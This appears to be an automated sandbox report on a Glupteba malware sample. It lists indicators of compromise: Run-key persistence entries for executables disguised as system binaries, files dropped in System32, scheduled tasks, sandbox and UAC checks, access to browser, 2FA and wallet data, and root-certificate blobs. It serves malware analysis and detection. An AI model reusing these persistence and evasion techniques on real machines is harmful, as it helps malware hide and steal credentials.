glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

System Information Discovery

Processes:

rTJmpNroSzcZ2hyO5FgjcQTc.exeXe_oJj6i8BAAxfMFceiuazGr.exeld0xZ3kQ40S3Liv8SVEAFr4q.exeZGDPFCTD_VZIqVCCnTF9izae.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rTJmpNroSzcZ2hyO5FgjcQTc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rTJmpNroSzcZ2hyO5FgjcQTc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Xe_oJj6i8BAAxfMFceiuazGr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Xe_oJj6i8BAAxfMFceiuazGr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ld0xZ3kQ40S3Liv8SVEAFr4q.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ld0xZ3kQ40S3Liv8SVEAFr4q.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ZGDPFCTD_VZIqVCCnTF9izae.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ZGDPFCTD_VZIqVCCnTF9izae.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

Setup (10).exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\International\Geo\Nation	Setup (10).exe

Loads dropped DLL 53 IoCs

Processes:

Setup (10).exeBXEi1nwcAlyBrA2uIxQi98MB.exe3FyhsKaxI4JVmtHjcZ5MshWn.exeBFafj0WNEwStOL8atl0gJOMh.exe3FyhsKaxI4JVmtHjcZ5MshWn.exe5099886.exeBFafj0WNEwStOL8atl0gJOMh.tmp3FyhsKaxI4JVmtHjcZ5MshWn.exeEn4NVU90WutUC9D7nfHts7iL.exeWerFault.exe3FyhsKaxI4JVmtHjcZ5MshWn.exe

pid	process
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
904	BXEi1nwcAlyBrA2uIxQi98MB.exe
956	3FyhsKaxI4JVmtHjcZ5MshWn.exe
1656	Setup (10).exe
1296	BFafj0WNEwStOL8atl0gJOMh.exe
2312	3FyhsKaxI4JVmtHjcZ5MshWn.exe
2068	5099886.exe
1260	BFafj0WNEwStOL8atl0gJOMh.tmp
1260	BFafj0WNEwStOL8atl0gJOMh.tmp
1260	BFafj0WNEwStOL8atl0gJOMh.tmp
2808	3FyhsKaxI4JVmtHjcZ5MshWn.exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
1656	Setup (10).exe
2456	En4NVU90WutUC9D7nfHts7iL.exe
2456	En4NVU90WutUC9D7nfHts7iL.exe
2456	En4NVU90WutUC9D7nfHts7iL.exe
2456	En4NVU90WutUC9D7nfHts7iL.exe
3056	WerFault.exe
3056	WerFault.exe
3056	WerFault.exe
3056	WerFault.exe
3056	WerFault.exe
456	3FyhsKaxI4JVmtHjcZ5MshWn.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 7 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
\Users\Admin\Documents\ZGDPFCTD_VZIqVCCnTF9izae.exe	themida
\Users\Admin\Documents\ld0xZ3kQ40S3Liv8SVEAFr4q.exe	themida
C:\Users\Admin\Documents\ld0xZ3kQ40S3Liv8SVEAFr4q.exe	themida
C:\Users\Admin\Documents\ZGDPFCTD_VZIqVCCnTF9izae.exe	themida
behavioral3/memory/2008-141-0x0000000000810000-0x0000000000811000-memory.dmp	themida
behavioral3/memory/268-139-0x00000000009E0000-0x00000000009E1000-memory.dmp	themida
\Users\Admin\Documents\rTJmpNroSzcZ2hyO5FgjcQTc.exe	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 22 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

3FyhsKaxI4JVmtHjcZ5MshWn.exe3FyhsKaxI4JVmtHjcZ5MshWn.exe3FyhsKaxI4JVmtHjcZ5MshWn.exe5099886.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Windows\\System32\\fwcfg\\spoolsv.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Setup (10) = "\"C:\\Documents and Settings\\Setup (10).exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Documents and Settings\\services.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\Windows\\System32\\gcdef\\lsm.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\4537d782-9a0d-11eb-a52e-c2ebb310cb62\\dllhost.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\sppsvc.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Setup (10) = "\"C:\\Documents and Settings\\Setup (10).exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\System32\\wbem\\sppwmi\\WmiPrvSE.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files\\WindowsPowerShell\\Modules\\services.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ld0xZ3kQ40S3Liv8SVEAFr4q = "\"C:\\Users\\Admin\\Documents\\Opened\\ld0xZ3kQ40S3Liv8SVEAFr4q.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\System32\\C_10081\\smss.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\PerfLogs\\Admin\\lsm.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\System32\\vcomp110\\conhost.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\PerfLogs\\Admin\\wininit.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BFafj0WNEwStOL8atl0gJOMh = "\"C:\\Users\\Admin\\Documents\\Are\\BFafj0WNEwStOL8atl0gJOMh.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Windows\\L2Schemas\\wininit.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	5099886.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BFafj0WNEwStOL8atl0gJOMh.tmp = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\is-HFV9H.tmp\\BFafj0WNEwStOL8atl0gJOMh.tmp.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\System32\\iscsilog\\csrss.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6529285 = "\"C:\\Users\\Admin\\AppData\\Roaming\\AssertRegister\\6529285.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\schtasks = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\schtasks.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BFafj0WNEwStOL8atl0gJOMh.tmp = "\"C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\BFafj0WNEwStOL8atl0gJOMh.tmp.exe\""	3FyhsKaxI4JVmtHjcZ5MshWn.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

Processes:

rTJmpNroSzcZ2hyO5FgjcQTc.exeXe_oJj6i8BAAxfMFceiuazGr.exeld0xZ3kQ40S3Liv8SVEAFr4q.exeZGDPFCTD_VZIqVCCnTF9izae.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	rTJmpNroSzcZ2hyO5FgjcQTc.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Xe_oJj6i8BAAxfMFceiuazGr.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ld0xZ3kQ40S3Liv8SVEAFr4q.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ZGDPFCTD_VZIqVCCnTF9izae.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 13 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
275	ipinfo.io
415	ipinfo.io
23	ipinfo.io
24	ipinfo.io
158	ipinfo.io
202	ip-api.com
228	ipinfo.io
251	ipinfo.io
418	ipinfo.io
165	ipinfo.io
237	ipinfo.io
252	ipinfo.io
276	ipinfo.io

Drops file in System32 directory 12 IoCs

Processes:

3FyhsKaxI4JVmtHjcZ5MshWn.exe3FyhsKaxI4JVmtHjcZ5MshWn.exe3FyhsKaxI4JVmtHjcZ5MshWn.exe

description	ioc	process
File created	C:\Windows\System32\gcdef\101b941d020240259ca4912829b53995ad543df6	3FyhsKaxI4JVmtHjcZ5MshWn.exe
File created	C:\Windows\System32\iscsilog\886983d96e3d3e31032c679b2d4ea91b6c05afef	3FyhsKaxI4JVmtHjcZ5MshWn.exe
File created	C:\Windows\System32\C_10081\smss.exe	3FyhsKaxI4JVmtHjcZ5MshWn.exe
File created	C:\Windows\System32\C_10081\69ddcba757bf72f7d36c464c71f42baab150b2b9	3FyhsKaxI4JVmtHjcZ5MshWn.exe
File created	C:\Windows\System32\fwcfg\spoolsv.exe	3FyhsKaxI4JVmtHjcZ5MshWn.exe
File created	C:\Windows\System32\gcdef\lsm.exe	3FyhsKaxI4JVmtHjcZ5MshWn.exe
File created	C:\Windows\System32\iscsilog\csrss.exe	3FyhsKaxI4JVmtHjcZ5MshWn.exe
File created	C:\Windows\System32\wbem\sppwmi\WmiPrvSE.exe	3FyhsKaxI4JVmtHjcZ5MshWn.exe
File created	C:\Windows\System32\wbem\sppwmi\24dbde2999530ef5fd907494bc374d663924116c	3FyhsKaxI4JVmtHjcZ5MshWn.exe
File created	C:\Windows\System32\vcomp110\conhost.exe	3FyhsKaxI4JVmtHjcZ5MshWn.exe
File created	C:\Windows\System32\vcomp110\088424020bedd6b28ac7fd22ee35dcd7322895ce	3FyhsKaxI4JVmtHjcZ5MshWn.exe
File created	C:\Windows\System32\fwcfg\f3b6ecef712a24f33798f5d2fb3790c3d9b894c4	3FyhsKaxI4JVmtHjcZ5MshWn.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

ld0xZ3kQ40S3Liv8SVEAFr4q.exeZGDPFCTD_VZIqVCCnTF9izae.exerTJmpNroSzcZ2hyO5FgjcQTc.exeXe_oJj6i8BAAxfMFceiuazGr.exe

pid process

268 ld0xZ3kQ40S3Liv8SVEAFr4q.exe
2008 ZGDPFCTD_VZIqVCCnTF9izae.exe
2348 rTJmpNroSzcZ2hyO5FgjcQTc.exe
2328 Xe_oJj6i8BAAxfMFceiuazGr.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

7UONhetEW1U9g8L58HdBk2yv.exe

description pid process target process

PID 752 set thread context of 2276 752 7UONhetEW1U9g8L58HdBk2yv.exe 7UONhetEW1U9g8L58HdBk2yv.exe

pid	process
268	ld0xZ3kQ40S3Liv8SVEAFr4q.exe
2008	ZGDPFCTD_VZIqVCCnTF9izae.exe
2348	rTJmpNroSzcZ2hyO5FgjcQTc.exe
2328	Xe_oJj6i8BAAxfMFceiuazGr.exe

description	pid	process	target process
PID 752 set thread context of 2276	752	7UONhetEW1U9g8L58HdBk2yv.exe	7UONhetEW1U9g8L58HdBk2yv.exe

Drops file in Program Files directory 2 IoCs

Processes:

3FyhsKaxI4JVmtHjcZ5MshWn.exe

description	ioc	process
File created	C:\Program Files\WindowsPowerShell\Modules\services.exe	3FyhsKaxI4JVmtHjcZ5MshWn.exe
File created	C:\Program Files\WindowsPowerShell\Modules\c5b4cb5e9653cce737f29f72ba880dd4c4bab27d	3FyhsKaxI4JVmtHjcZ5MshWn.exe

Drops file in Windows directory 2 IoCs

Processes:

3FyhsKaxI4JVmtHjcZ5MshWn.exe

description	ioc	process
File created	C:\Windows\L2Schemas\560854153607923c4c5f107085a7db67be01f252	3FyhsKaxI4JVmtHjcZ5MshWn.exe
File created	C:\Windows\L2Schemas\wininit.exe	3FyhsKaxI4JVmtHjcZ5MshWn.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 6 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2728	1364	WerFault.exe	5597844.exe
3056	2500	WerFault.exe	6529285.exe
3212	1776	WerFault.exe	8999241.exe
4756	3236	WerFault.exe	6033784.exe
5088	2172	WerFault.exe	5564009.exe
2852	2384	WerFault.exe	2277805.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

En4NVU90WutUC9D7nfHts7iL.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	En4NVU90WutUC9D7nfHts7iL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	En4NVU90WutUC9D7nfHts7iL.exe

Creates scheduled task(s) 1 TTPs 27 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

pid	process
2060	schtasks.exe
1724	schtasks.exe
772	schtasks.exe
2188	schtasks.exe
2664	schtasks.exe
2164	schtasks.exe
1676	schtasks.exe
2596	schtasks.exe
2672	schtasks.exe
2196	schtasks.exe
2700	schtasks.exe
1356	schtasks.exe
2172	schtasks.exe
2596	schtasks.exe
2644	schtasks.exe
2688	schtasks.exe
2232	schtasks.exe
2220	schtasks.exe
1928	schtasks.exe
2208	schtasks.exe
2584	schtasks.exe
2608	schtasks.exe
340	schtasks.exe
2624	schtasks.exe
2680	schtasks.exe
2076	schtasks.exe
960	schtasks.exe

Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

752 timeout.exe
4220 timeout.exe
3396 timeout.exe
4060 timeout.exe

pid	process
752	timeout.exe
4220	timeout.exe
3396	timeout.exe
4060	timeout.exe

Kills process with taskkill 9 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4992	taskkill.exe
2804	taskkill.exe
1656	taskkill.exe
4688	taskkill.exe
828	taskkill.exe
3976	taskkill.exe
4764	taskkill.exe
2708	taskkill.exe
2676	taskkill.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Setup (10).exeNp8vA5UCo4zkkwJyvKzCJUo3.exeEn4NVU90WutUC9D7nfHts7iL.exeBFafj0WNEwStOL8atl0gJOMh.tmp

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Setup (10).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Setup (10).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Np8vA5UCo4zkkwJyvKzCJUo3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	En4NVU90WutUC9D7nfHts7iL.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	En4NVU90WutUC9D7nfHts7iL.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	Setup (10).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1